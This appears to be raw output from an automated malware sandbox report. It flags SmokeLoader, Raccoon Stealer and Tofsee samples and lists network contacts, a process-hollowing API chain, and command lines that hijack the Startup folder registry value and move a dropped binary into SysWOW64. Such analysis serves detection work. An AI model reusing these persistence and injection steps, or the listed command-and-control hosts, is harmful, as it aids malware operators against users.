                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jsplktel.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: host-data-coin-11.com
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.6:49703 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49720 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.6:49749 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49751 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49762 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49772 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          barindex
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 1.0.zmbGUZTICp.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.gdrgbdj.6515a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.zmbGUZTICp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.1.gdrgbdj.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.2.gdrgbdj.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.zmbGUZTICp.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.zmbGUZTICp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.zmbGUZTICp.exe.6415a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.zmbGUZTICp.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.408517834.00000000005C1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.408471084.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.462828818.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.392111314.0000000004151000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.462437704.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                          Source: gdrgbdj, 00000005.00000002.444106308.000000000072A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          E-Banking Fraud:

                          barindex
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 31.2.A7F0.exe.4d60e50.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.3.A7F0.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.4d60e50.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.3.A7F0.exe.4e00000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001F.00000002.640601105.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000002.662718681.0000000004D60000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000003.553585077.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: A7F0.exe PID: 2200, type: MEMORYSTR

                          Spam, unwanted Advertisements and Ransom Demands:

                          barindex
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 11.3.309C.exe.660000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.3.tejjnepq.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 27.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.ed0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 27.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.ed0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.309C.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.309C.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.309C.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000018.00000003.484958252.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.487069234.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000002.639945191.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000003.465535302.0000000000660000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.488137960.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.483029167.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.487496290.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.482701616.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 309C.exe PID: 5132, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: tejjnepq.exe PID: 2320, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4692, type: MEMORYSTR

                          System Summary:

                          barindex
                          PE file has nameless sectionsShow sources
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5200 -ip 5200
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_0042B040
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_0042A260
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00424C60
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_006431FF
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00643253
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00402A5F
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00402AB3
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_00402A5F
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_00402B2E
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00402A5F
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00402AB3
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_00402A5F
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_00402AB3
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_004027CA
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_00401FF1
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_0040158E
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_004015A6
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_004015BC
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_00411065
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_00412A02
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_0040CAC5
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_00410B21
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_004115A9
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_0208160C
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_020815DE
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_020815F6
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00410800
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00411280
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_004103F0
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_004109F0
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_0040C913
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_004250A0
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_0042B480
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_0042A6A0
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_00B596F0
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_00B50470
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_00B50462
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025B53F8
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025B1810
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025B2E48
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025B0448
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025C4758
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025C67B8
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025C1528
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025C08B0
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025C2C88
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025CAD68
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025C90D3
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                          Source: zmbGUZTICp.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: zmbGUZTICp.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: zmbGUZTICp.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: zmbGUZTICp.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: A7F0.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: A7F0.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: A7F0.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1E7F.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1E7F.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1E7F.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 2DB3.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 2DB3.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 2DB3.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 2DB3.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 309C.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 309C.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 309C.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 309C.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BC16.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BC16.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BC16.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BC16.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1D34.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1D34.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1D34.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 2D04.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gdrgbdj.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gdrgbdj.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gdrgbdj.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gdrgbdj.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tejjnepq.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tejjnepq.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tejjnepq.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tejjnepq.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeSection loaded: mscorjit.dll
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\
                          Source: zmbGUZTICp.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ozuqupbe\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: String function: 004048D0 appears 460 times
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: String function: 00632794 appears 35 times
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: String function: 0040EE2A appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: String function: 0041E570 appears 32 times
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: String function: 00402544 appears 53 times
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: String function: 004229D0 appears 133 times
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: String function: 0041E150 appears 172 times
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00640110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00402491 NtOpenKey,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                          Source: A7F0.exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 1E7F.exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 1D34.exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: D452.exe.2.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: 239.exe.2.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: D452.exe.2.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: D452.exe.2.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: D452.exe.2.drStatic PE information: Section: ZLIB complexity 1.00051229508
                          Source: D452.exe.2.drStatic PE information: Section: ZLIB complexity 1.0107421875
                          Source: 239.exe.2.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: 239.exe.2.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: 239.exe.2.drStatic PE information: Section: ZLIB complexity 1.00051229508
                          Source: 239.exe.2.drStatic PE information: Section: ZLIB complexity 1.0107421875
                          Source: 2D04.exe.2.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                          Source: zmbGUZTICp.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gdrgbdjJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@61/51@81/19
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: zmbGUZTICp.exeVirustotal: Detection: 35%
                          Source: zmbGUZTICp.exeReversingLabs: Detection: 41%
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknownProcess created: C:\Users\user\Desktop\zmbGUZTICp.exe "C:\Users\user\Desktop\zmbGUZTICp.exe"
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeProcess created: C:\Users\user\Desktop\zmbGUZTICp.exe "C:\Users\user\Desktop\zmbGUZTICp.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\gdrgbdj C:\Users\user\AppData\Roaming\gdrgbdj
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjProcess created: C:\Users\user\AppData\Roaming\gdrgbdj C:\Users\user\AppData\Roaming\gdrgbdj
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1E7F.exe C:\Users\user\AppData\Local\Temp\1E7F.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2DB3.exe C:\Users\user\AppData\Local\Temp\2DB3.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5200 -ip 5200
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\309C.exe C:\Users\user\AppData\Local\Temp\309C.exe
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 520
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3F71.exe C:\Users\user\AppData\Local\Temp\3F71.exe
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ozuqupbe\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\
